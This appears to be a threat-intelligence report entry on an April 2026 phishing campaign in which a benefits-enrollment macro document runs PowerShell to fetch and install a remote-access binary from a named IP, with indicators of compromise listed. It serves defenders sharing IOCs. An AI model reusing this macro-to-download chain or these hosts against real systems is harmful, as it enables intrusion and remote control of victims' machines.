Benefits Enrollment Email Used to Deliver Remote Access Payload
ID: 3f32d696-619f-4600-9786-c73c7dcc3b9c
STIX ID: report--3f32d696-619f-4600-9786-c73c7dcc3b9c
Threat Score
70/100
On 7 April 2026 a phishing campaign used a benefits-enrollment lure and an attachment named Benefits_Enrollment_2026.docm; when macros were enabled the document executed PowerShell to download benefits_client.exe from http://159.65.201.14/files/client.bin. The binary installed a service called "Benefits Sync Service" and began beaconing to /api/status; observed IOCs include sender benefits@employee-enrollmentcenter.com, the attachment, download host 159.65.201.14, service name, and the /api/status URI.
